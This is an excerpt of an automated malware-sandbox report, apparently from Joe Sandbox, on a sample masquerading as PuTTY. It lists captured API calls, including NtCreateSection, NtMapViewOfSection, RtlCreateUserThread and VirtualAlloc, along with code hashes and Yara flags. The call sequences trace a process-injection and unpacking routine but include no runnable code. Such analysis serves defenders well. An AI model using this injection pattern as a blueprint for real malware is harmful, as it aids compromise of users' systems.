                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                              • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                              • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                              • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                              • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                              • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                              • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                              • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                              • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                              • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                              • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                              • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                              • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0084C890
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_849000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: c922622bb145152d5802465c9ad5a526f46d4f96be88e7316b82f73f246e2fd7
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 32113979A00208EFDB01DF98C985E98BBF5EF08351F0580A4F9489B362D371EA90DF91
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                              • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                              • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                              • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: .$GetProcAddress.$l
                                              • API String ID: 0-2784972518
                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction ID: 1881473ebb8cc92b2ed4aa44de7bd22430dcd9ab104b5d0f7d18c9599c015af2
                                              • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                              • Instruction Fuzzy Hash: C4316BB6910609DFDB10CF99C880AAEBBF9FF88324F24404AD941A7351D775EA45CFA4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177166657.0000000000849000.00000040.00000020.00020000.00000000.sdmp, Offset: 00849000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_849000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction ID: 650ac18f518779146fdec049a8659dcb9e0cb424cdc7a4eb1686d30cc76a6422
                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                              • Instruction Fuzzy Hash: 9111AC72341104AFD780DE59DC91EB273EAFB89320B2980A5E908CB312E676EC02C760
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                              • Instruction ID: b4d99e39562e0a8d34f4e8a2adcb899dff0217260de8cdfa4497104cdd6e8b78
                                              • Opcode Fuzzy Hash: 0451e9d16359af643799e3b23a0685e127db626760f30cb9f61b7ea239eb6fd6
                                              • Instruction Fuzzy Hash: 7A117A22B1C21196E3179A918A460A97710DB11360B74C87BD493BB8F3C27D98066BCB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                              • Instruction ID: 9c1a6264578523f2b95dbae5c8345fb03cc7a3f7f5b051fb9d7a91e089220ce3
                                              • Opcode Fuzzy Hash: 7431593d3acf0a61d97152af6e57b32ce30d2b428f4d380d733201fdbbf0ad36
                                              • Instruction Fuzzy Hash: 06118C27A1C20096E3179A90C6461A5B760DB12360B74887BD493778F3D17D58065BCF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                              • Instruction ID: 7cced9f7fdb1c3f7b009c6269bf5343d8ea2104f00e9896e504acad3335f8aa1
                                              • Opcode Fuzzy Hash: 4ead3596dcdc828a5c4cfb9b817dc4ff7884f70c04ac3703ba61ef413fca77a8
                                              • Instruction Fuzzy Hash: 1811AB23F1C20056E3179F91C6460A8B760DB12360B748C7FD4826B8F7D27D98129BCB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                              • Instruction ID: 5938fd262c6d7fd7e9059b2c6d5fc66a7b7b37341f859f3ef56555a79cfd23f8
                                              • Opcode Fuzzy Hash: 862da947cf69c9b5c573b7de815aaadc364d2e787700889f4836839734fe5098
                                              • Instruction Fuzzy Hash: 0401AB33F1C20056E3179AA0C6860A9B760DB12360B74887BD482678F3D23D98025BCF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                              • Instruction ID: 34643119912da5106e2d45a94dd8d32290489c90b68d507143b233416c26121d
                                              • Opcode Fuzzy Hash: c0e11a3ef683fd68855c3224d2ea3fecd6130d6e756cf9f75479bdcd47c53b27
                                              • Instruction Fuzzy Hash: A101BD23F2821055D71B9BA0C6860E8BB20DA12360B7489BBD052778F3D23C94028BCD
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176668667.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_putty.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSection
                                              • String ID:
                                              • API String ID: 3132048701-0
                                              • Opcode ID: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                              • Instruction ID: 94d0d6187efa1b4f5fb96639de9bee4adb18fcc7c1e699108f742e7c63bf3b1b
                                              • Opcode Fuzzy Hash: 26b7c8141964b859a8c9d37ffff58683f7c78d268340d9480a59f47ab8784a65
                                              • Instruction Fuzzy Hash: FF019953F2D64126D72B9FA086460D9BB20E9133B07748DBFD4A267CF7C274941487C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2177275719.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_940000_putty.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction ID: 8068ea80f1d368fdc3dd01e3f72fddacea9dc050a46abd4e245b775ed3158265
                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                              • Instruction Fuzzy Hash: 5F018F76A006148FDB21CF64C804FAA33B9EBC6316F4544A5DA0A9B281E774A9458F90
                                              APIs
                                              • EndUpdateResourceA.KERNEL32(00000000,00000000,0042204C), ref: 0041E669
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumberResourceUpdate
                                              • String ID: <
                                              • API String ID: 2454257732-4251816714
                                              • Opcode ID: 38b6396692d561f846e82d484e43ff9839e86d75bee0adaba9c0cd9ffd17fbac
                                              • Instruction ID: 1831bf02aaf20b182b31ea32c56b48fe0af4060d55c8b6986e8c7cbcbf37122f
                                              • Opcode Fuzzy Hash: 38b6396692d561f846e82d484e43ff9839e86d75bee0adaba9c0cd9ffd17fbac
                                              • Instruction Fuzzy Hash: 9A118FB51043419FD320DF25D984BABB7E4FF98314FC18D2DF6944A281C778958ACB9A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction ID: ae9c123fa49f40dbb681c5afc6ce5ec73cb2cd7577c926c04dcfacae745abae9
                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction Fuzzy Hash: D411407210014ABBCF125E85DC42CEE3F62BB18354B598526FE1859131D33ACAB7AB89
                                              APIs
                                                • Part of subcall function 0041E600: GetStartupInfoA.KERNEL32(00000000), ref: 0041E617
                                                • Part of subcall function 0041E600: GetModuleHandleA.KERNEL32(00000000), ref: 0041E61F
                                              • GetEnvironmentStringsW.KERNEL32(00000000), ref: 0041E749
                                              • FindFirstVolumeW.KERNEL32(00000000,00000000), ref: 0041E753
                                              • GetShortPathNameW.KERNEL32(0042333C,?,00000000), ref: 0041E765
                                              • DeleteVolumeMountPointA.KERNEL32(00000000), ref: 0041E784
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: Volume$DeleteEnvironmentFindFirstHandleInfoModuleMountNamePathPointShortStartupStrings
                                              • String ID:
                                              • API String ID: 3566876605-0
                                              • Opcode ID: 398f690dd63b4dc214b9c005ea9467d16438635c8015b47d51cfcc86b307485e
                                              • Instruction ID: 7d5483026b8d33337ac4a9549a5db5e9d718fad291004e212951830aed23f32c
                                              • Opcode Fuzzy Hash: 398f690dd63b4dc214b9c005ea9467d16438635c8015b47d51cfcc86b307485e
                                              • Instruction Fuzzy Hash: 9B0186B6A50100EBD664EB65ED4ABA633A4B71C705FC08425F746862A0DFB85444CFAF
                                              APIs
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2176696663.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_411000_putty.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumber
                                              • String ID: <
                                              • API String ID: 3700106692-4251816714
                                              • Opcode ID: 8250a3e23bbfec59b690a0df1105bb907fd8dd0d175828653fc7dd8941d46e01
                                              • Instruction ID: 78699f444b43a7322d8c77efa18837f699f308161780eb29aa2cbd1f541736c2
                                              • Opcode Fuzzy Hash: 8250a3e23bbfec59b690a0df1105bb907fd8dd0d175828653fc7dd8941d46e01
                                              • Instruction Fuzzy Hash: 220171751083829FC720DF25D84465FB7E4FF84329F858D1DE5A44A240C778954ACB4B

                                              Execution Graph

                                              Execution Coverage:7.9%
                                              Dynamic/Decrypted Code Coverage:25.5%
                                              Signature Coverage:0%
                                              Total number of Nodes:192
                                              Total number of Limit Nodes:6

                                              Control-flow Graph

                                              control_flow_graph 0 41e7a0-41e7d0 (graph nodes omitted); calls: GetDateFormatA, FoldStringA, BuildCommDCBA, GetTimeFormatA, SetProcessPriorityBoost, SetFileAttributesA, UnregisterWaitEx, SetLocaleInfoA, InterlockedDecrement, GetCommandLineA, SetErrorMode, GetAtomNameA, SearchPathA, SetDefaultCommConfigA, GetConsoleAliasW, GetVersionExA, DisconnectNamedPipe, GetEnvironmentStringsW, WriteConsoleOutputW, GetModuleHandleA, OpenFileMappingW, LocalAlloc, InterlockedIncrement; subcalls: 41e560, 41e420, 41e710, 41e410
                                              APIs
                                              • GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 0041E87F
                                              • FoldStringA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0041E8BA
                                              • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 0041E8C2
                                              • GetTimeFormatA.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 0041E8F3
                                              • SetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041E8FB
                                              • SetFileAttributesA.KERNEL32(00423370,00000000), ref: 0041E907
                                              • UnregisterWaitEx.KERNEL32(?,00000000), ref: 0041E917
                                              • SetLocaleInfoA.KERNEL32(00000000,00000000,00423380), ref: 0041E924
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Format$AttributesBoostBuildCommDateFileFoldInfoLocalePriorityProcessStringTimeUnregisterWait
                                              • String ID:
                                              • API String ID: 3960956766-0
                                              • Opcode ID: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction ID: 6ae51a12dd7b4aebb8f82212809d29e946f68f2589e94ec055893a89d6f8ae5b
                                              • Opcode Fuzzy Hash: 914c2a7e43a7881f3aa375db9e339a1e29a6939f754bf8832aeec207d45dfe88
                                              • Instruction Fuzzy Hash: 20A1C0B5904200AFD320EF61ED84DAB77ADFB88304F40493EFA4692261DB789C45CB6D

                                              Control-flow Graph

                                              control_flow_graph 155 4013bf-4013c8 (graph nodes omitted); calls: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; subcalls: 40113b, 401685
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                              • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65

                                              Control-flow Graph

                                              control_flow_graph 231 4014b5-4014f8 (graph nodes omitted); calls: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; subcalls: 40113b, 401685
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                              • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64

                                              Control-flow Graph

                                              control_flow_graph 279 4014d3-4014eb (graph nodes omitted); calls: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; subcalls: 40113b, 401685
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectView
                                              • String ID:
                                              • API String ID: 1652636561-0
                                              • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                              • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24

                                              Control-flow Graph

                                              control_flow_graph 327 4014f7-40150e (graph nodes omitted); calls: NtDuplicateObject, NtCreateSection, NtMapViewOfSection; subcalls: 40113b, 401685
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                              • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24

                                              Control-flow Graph

                                              control_flow_graph 367 402f8f-402fb3 (graph nodes omitted); calls: RtlCreateUserThread, NtTerminateProcess
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                              • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5

                                              Control-flow Graph

                                              control_flow_graph 70 88003c-880047 (graph nodes omitted); calls: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA; subcalls: 880a3f, 880e0f, 880d90, 880a69, 880cce, 880ce7
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_880000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15

                                              Control-flow Graph

                                              control_flow_graph 366 41e420-41e55e GetModuleHandleW GetProcAddress VirtualProtect
                                              APIs
                                              • GetModuleHandleW.KERNEL32(007FBE70), ref: 0041E4FC
                                              • GetProcAddress.KERNEL32(00000000,00428568), ref: 0041E539
